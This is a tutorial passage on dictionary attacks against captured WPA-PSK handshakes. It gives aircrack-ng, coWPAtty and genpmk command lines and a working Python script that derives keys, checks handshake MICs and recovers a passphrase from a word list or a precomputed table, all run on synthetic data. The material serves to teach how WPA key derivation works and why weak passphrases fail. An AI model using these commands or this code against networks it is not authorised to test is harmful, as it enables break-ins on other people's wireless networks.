Performing the Crack
The Wi-Fi Alliance was wise to mandate an eight-character minimum for WPA-PSK passphrases. A key that long essentially renders brute-force methods useless, because the number of possible eight-character keys drawn from the 94 printable ASCII characters is just over six quadrillion (94^8, or about 6 x 10^15).
My poor little laptop can only crunch about 35 hashes a second, so it would take me about five-and-a-half million years (I'm not kidding here either, I did the math: 6 x 10^15 keys divided by 35 per second is roughly 1.7 x 10^14 seconds) either to build a hash table covering every eight-character key or to test every combination in a brute-force attack.
What's more, since the hash is salted with the SSID of the AP, the hash table I just spent five million years creating would only be good against APs with that exact SSID. So, clearly, we're not going to be brute-forcing any WPA keys anytime soon.
What we can do, however, is narrow the list of candidate passphrases by making educated guesses, compute the hash of each guess and check it against the captured handshake. This technique is called a dictionary attack.
BackTrack v2 comes bundled with a good selection of simple wordlists, as well as four lists of passwords that were common in the '90s, sorted by frequency (the most common passwords are at the top, the least common at the bottom). The lists seem to be missing from BackTrack v3, but there are plenty of wordlists around the 'net.
Using the wordlists from BackTrack v2, we can mount a dictionary attack on our captured WPA handshake with either aircrack-ng or coWPAtty. Aircrack-ng runs much faster on my attacking system (testing 3740 keys took 35 seconds) and has native support for multiple processors. coWPAtty, on the other hand, runs much slower (testing the same 3740 keys took almost two minutes), but it can accept hash files precomputed by genpmk.
Start a dictionary attack against a WPA key with the following:
aircrack-ng -e AP_SID -w dictionary_file capture_file
Example (BackTrack v3):
aircrack-ng -e snb -w /pentest/wireless
Aircrack-ng shows each passphrase as it tries it, along with the hex master key, transient key and EAPOL HMAC derived from it, which is reassuring since some attacks can take a long time. Figure 8 shows that aircrack-ng took 35 seconds to find the test key "dictionary".
Figure 8: Aircrack-ng, Key Found!
To use coWPAtty instead, first move into the coWPAtty directory, either by selecting it from the BackTrack menu or by changing to /pentest/wireless/cowpatty-4.0. Then run:
./cowpatty -s AP_SID -f dictionary_file -r capture_file
./cowpatty -s snb -f dict -r Kismet-Jan-15-2008-1.dump
coWPAtty doesn't say much about its run-time status, but prints updates every thousand keys. Figure 9 shows that coWPAtty took a little over two minutes to recover the test key "dictionary".
Figure 9: coWPAtty, Key Found!
Alternately, coWPAtty can use a precomputed hash file to attack a WPA key. Precomputed hash files work on the same principle as rainbow tables (although genpmk's files are a plain list of passphrase/hash pairs rather than reduction chains), letting you trade the time required to crack a given key for hash file size and precomputation time.
Each stored hash (the pairwise master key, or PMK) is paired with the plaintext passphrase that produced it. The PMK is never sent over the air, so the engine cannot simply look it up from the capture; what the table buys you is skipping the expensive 4096-iteration key derivation for every guess, leaving only a cheap check of each stored PMK against the captured handshake before reading off the matching plaintext. Since WPA key derivation is salted with the SSID, a table only works against APs with the same SSID that was used to compute it.
Hash tables can be very effective, but they require disk space, and the tables get rather large, quickly. Even with these limitations, the Church of WiFi has computed hash tables for the 1000 most common SSIDs against one million common passphrases.
You can generate a hash table from within the cowpatty directory with coWPAtty's genpmk:
./genpmk -s AP_SID -f dictionary_file -d hash_output_file
./genpmk -s snb -f dict -d dict_hash
Figure 10: genpmk Hash Table Generation
Now, using the newly created hash table, the crack takes only a fraction of a second (0.11 seconds, to be precise), roughly 1/1100th of the time it took without a hash table.
./cowpatty -s AP_SID -d hash_output_file -r capture_file
./cowpatty -s snb -d dict_hash -r Kismet-Jan-15-2008-1.dump
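To make concrete what the dictionary attack and the two coWPAtty modes above actually compute, here is an added Python example; it is not code from coWPAtty, aircrack-ng or this article. It derives the PMK exactly as 802.11i specifies (PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations), expands it to the PTK, and verifies the MIC of a synthetic handshake. The MAC addresses, nonces, EAPOL frame and word list are all constructed for the example; the SSID "snb" and the test key "dictionary" are borrowed from the article's own run. The same functions show why a genpmk table built for one SSID is useless against another.

```python
"""Dictionary attack and precomputed-PMK attack on a WPA/WPA2-PSK four-way
handshake, written from scratch for illustration (not aircrack-ng or coWPAtty).
All MAC addresses, nonces and the word list are constructed sample data."""
import hashlib
import hmac
import struct

# Offset of the 16-byte MIC inside an EAPOL-Key frame: 4-byte 802.1X header, then
# descriptor type (1), key info (2), key length (2), replay counter (8), nonce (32),
# IV (16), RSC (8), ID (8) = 81 bytes before the MIC field.
MIC_OFFSET = 81


def derive_pmk(passphrase, ssid):
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, which is why a precomputed table is SSID-specific."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """802.11i PRF-512: expand the PMK into the 64-byte PTK using both MAC
    addresses and both handshake nonces (each pair ordered low to high)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol, version):
    """MIC over the EAPOL-Key frame with its MIC field zeroed. Key descriptor
    version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1 cut to 16."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def pmk_matches(pmk, hs):
    """The cheap part: one PTK derivation and one HMAC per candidate PMK."""
    kck = derive_ptk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
    captured = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["version"]), captured)


def dictionary_attack(hs, words):
    """What aircrack-ng -w / cowpatty -f do: pay the PBKDF2 cost for every guess."""
    for word in words:
        if not 8 <= len(word) <= 63:      # cannot be a WPA-PSK passphrase, skip it
            continue
        if pmk_matches(derive_pmk(word, hs["ssid"]), hs):
            return word
    return None


def build_pmk_table(ssid, words):
    """What genpmk does: compute the PMK once per (SSID, passphrase) pair."""
    return [(w, derive_pmk(w, ssid)) for w in words if 8 <= len(w) <= 63]


def table_attack(hs, table):
    """What cowpatty -d does: only the cheap PTK/MIC check per stored PMK."""
    for word, pmk in table:
        if pmk_matches(pmk, hs):
            return word
    return None


def make_handshake(ssid, passphrase, version=2):
    """Build a synthetic message 2 of the four-way handshake (it carries the SNonce
    and the first MIC) for a network whose passphrase we know, so the attacks above
    can be exercised offline. Everything in here is constructed sample data."""
    aa = bytes.fromhex("001122aabbcc")                  # AP MAC
    spa = bytes.fromhex("00aabb112233")                 # client MAC
    anonce = hashlib.sha256(b"sample-anonce").digest()  # 32-byte nonces
    snonce = hashlib.sha256(b"sample-snonce").digest()
    key_info = 0x0108 | version            # pairwise key, MIC bit set, descriptor version
    body = (struct.pack(">BHH", 2, key_info, 16)        # RSN descriptor, key info, key length
            + (1).to_bytes(8, "big") + snonce           # replay counter, SNonce
            + bytes(16) + bytes(8) + bytes(8)           # IV, RSC, ID
            + bytes(16) + struct.pack(">H", 0))         # MIC placeholder, key data length
    eapol = struct.pack(">BBH", 1, 3, len(body)) + body # 802.1X v1, type 3 = EAPOL-Key
    hs = {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce,
          "snonce": snonce, "eapol": eapol, "version": version}
    kck = derive_ptk(derive_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    hs["eapol"] = eapol[:MIC_OFFSET] + eapol_mic(kck, eapol, version) + eapol[MIC_OFFSET + 16:]
    return hs


# Constructed word list; "letmein" is too short to be a WPA passphrase at all.
WORDLIST = ["password", "letmein", "12345678", "dictionary", "qwertyuiop"]

if __name__ == "__main__":
    hs = make_handshake("snb", "dictionary")
    print("dictionary attack:     ", dictionary_attack(hs, WORDLIST))
    print("table built for 'snb': ", table_attack(hs, build_pmk_table("snb", WORDLIST)))
    print("table built for 'IEEE':", table_attack(hs, build_pmk_table("IEEE", WORDLIST)))
```

Run directly, it recovers "dictionary" twice (once paying the PBKDF2 cost per guess, once from a precomputed table) and fails with the table built for "IEEE", even though that table contains the right passphrase. The PBKDF2 step is what makes WPA cracking slow and what genpmk precomputes; the remaining per-candidate work is a few HMACs, which is why the hash-table crack above finishes in a fraction of a second. The length filter reflects the 8-to-63 character rule for WPA-PSK passphrases, so guesses that could never be valid are not hashed at all.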